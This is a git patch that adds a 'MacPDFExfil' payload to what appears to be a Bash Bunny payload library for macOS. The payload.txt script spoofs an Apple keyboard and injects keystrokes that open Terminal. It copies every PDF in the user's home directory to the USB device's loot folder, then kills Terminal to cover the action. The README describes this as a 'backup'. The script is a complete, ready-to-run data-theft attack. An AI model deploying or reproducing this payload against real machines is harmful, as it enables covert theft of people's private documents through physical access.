From 7534270a7a6bbeee21fa7b2163e3f157ccb1ab7b Mon Sep 17 00:00:00 2001
From: k1ul3ss <kumsted@gmail.com>
Date: Sun, 16 Apr 2017 00:53:49 -0500
Subject: [PATCH] Added MacPDFExfil payload (#186)

---
 .../exfiltration/MacPDFExfil/README.md        | 15 ++++++++++
 .../exfiltration/MacPDFExfil/payload.txt      | 29 +++++++++++++++++++
 2 files changed, 44 insertions(+)
 create mode 100644 payloads/library/exfiltration/MacPDFExfil/README.md
 create mode 100644 payloads/library/exfiltration/MacPDFExfil/payload.txt

diff --git a/payloads/library/exfiltration/MacPDFExfil/README.md b/payloads/library/exfiltration/MacPDFExfil/README.md
new file mode 100644
index 00000000..4268875e
--- /dev/null
+++ b/payloads/library/exfiltration/MacPDFExfil/README.md
@@ -0,0 +1,15 @@
+# MacPDFExfil
+
+Author: k1ul3ss  
+Version: Version 1.0  
+Target: macOS  
+
+## Description
+
+Mounts as storage and acts as HID. Backup PDF files to the BashBunny
+
+## Configuration
+
+Configured to copy all PDFs located in the users home directory to the BashBunnny
+
+## STATUS
\ No newline at end of file
diff --git a/payloads/library/exfiltration/MacPDFExfil/payload.txt b/payloads/library/exfiltration/MacPDFExfil/payload.txt
new file mode 100644
index 00000000..0c363a27
--- /dev/null
+++ b/payloads/library/exfiltration/MacPDFExfil/payload.txt
@@ -0,0 +1,29 @@
+#!/bin/bash
+#
+# Title:         MacPDFExfil
+# Author:        k1ul3ss
+# Props:         audibleblink
+# Version:       1.0
+# Category:      Exfiltration
+# Target:        macOS
+# Attackmodes:   HID, Storage
+
+ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
+
+# device name
+dev_name="BashBunny"
+
+# loot directory
+lootdir="/Volumes/$dev_name/loot/"
+
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 3000
+# Find all PDFs stored in the user's home directory, and copy them over to the BashBunny storage.
+QUACK STRING find \~ -name \'*.pdf\' -exec cp \"{}\" $lootdir \\\;\; killall Terminal
+QUACK ENTER
+
+# sync the filesystem
+sync
\ No newline at end of file